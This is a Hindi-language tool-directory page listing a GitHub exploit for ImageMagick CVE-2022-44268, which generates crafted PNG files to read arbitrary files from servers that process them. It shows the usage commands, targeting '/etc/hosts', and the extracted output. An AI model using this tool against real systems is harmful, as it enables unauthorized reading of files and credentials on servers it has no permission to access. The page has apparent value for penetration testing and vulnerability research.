Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2022-44268 — दुर्भावनापूर्ण PNG फ़ाइलें उत्पन्न करता है ताकि ImageMagick LFI भेद्यता (CVE-2022-44268) का शोषण करके मनमानी फ़ाइल पढ़ी जा सके, साथ ही प्रमाण-अवधारणा के लिए निष्कर्षण स्क्रिप्ट भी शामिल है। | Kitploit
उपकरण/GitHubGitHub/pog-frog/cve-2022-44268
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubpog-frog/cve-2022-44268

cve-2022-44268

दुर्भावनापूर्ण PNG फ़ाइलें उत्पन्न करता है ताकि ImageMagick LFI भेद्यता (CVE-2022-44268) का शोषण करके मनमानी फ़ाइल पढ़ी जा सके, साथ ही प्रमाण-अवधारणा के लिए निष्कर्षण स्क्रिप्ट भी शामिल है।

रिपॉजिटरी देखें
123 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-44268

ImageMagick एक मुफ्त और ओपन-सोर्स क्रॉस-प्लेटफॉर्म सॉफ्टवेयर सूट है जो रास्टर इमेज और वेक्टर इमेज फाइलों को प्रदर्शित करने, रूपांतरित करने और संपादित करने के लिए उपयोग किया जाता है। यह 200 से अधिक इमेज फ़ाइल प्रारूपों को पढ़ और लिख सकता है। ImageMagick Apache License 2.0 के तहत लाइसेंस प्राप्त है। यह कमांड-लाइन टूल्स के रूप में, साथ ही C API और C++ क्लासेस के एक सेट के रूप में उपलब्ध है। Wikipedia

ImageMagick संस्करण 7.1.0-40 और उससे नीचे लोकल फ़ाइल इन्क्लूज़न भेद्यता के प्रति संवेदनशील हैं। यह भेद्यता उपयोगकर्ता द्वारा प्रदत्त इनपुट के अनुचित सत्यापन के कारण उत्पन्न होती है। एक हमलावर एक निर्मित PNG फ़ाइल को लक्ष्य पर भेजकर इस भेद्यता का शोषण कर सकता है। इस भेद्यता के सफल शोषण से हमलावर लक्ष्य सिस्टम पर मनमानी फ़ाइलें पढ़ सकता है।

इसकी खोज करने वाले शोधकर्ताओं को श्रेय:

  • Bryan Gonzalez और Ocelot Team

ImageMagick 7.1.0-40 का लाभ उठाने के लिए एक दुर्भावनापूर्ण PNG बनाएं:

  • CVE-2022-44267: सेवा से इनकार
  • CVE-2022-44268: जानकारी का खुलासा

आवश्यकताएँ

  • Python3
  • PIL (pip install Pillow)

उपयोग

generate.py के साथ PNG तैयार करना:

root@kitploit:~
python3  generate.py -i input.png -f "/etc/hosts" -o exploit.png

     
  ______     __  _____                   ______                
 |  _ \ \   / / |  __ \                 |  ____|               
 | |_) \ \_/ /  | |__) |__   __ _ ______| |__ _ __ ___   __ _  
 |  _ < \   /   |  ___/ _ \ / _` |______|  __| '__/ _ \ / _` | 
 | |_) | | |    | |  | (_) | (_| |      | |  | | | (_) | (_| | 
 |____/  |_|    |_|   \___/ \__, |      |_|  |_|  \___/ \__, | 
                             __/ |                       __/ | 
                            |___/                       |___/  

    

   [*] ImageMagick LFI Exploit
   [*] Embedding Payload to read the target file
   [*] Exploit PNG generated: exploit.png

PoC

root@kitploit:~
python3 extract.py downloaded_img.png
127.0.0.1       localhost
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

अस्वीकरण: कृपया अच्छे बनो, इसका उपयोग बुरे कार्यों के लिए न करें।

टूल डाउनलोड करें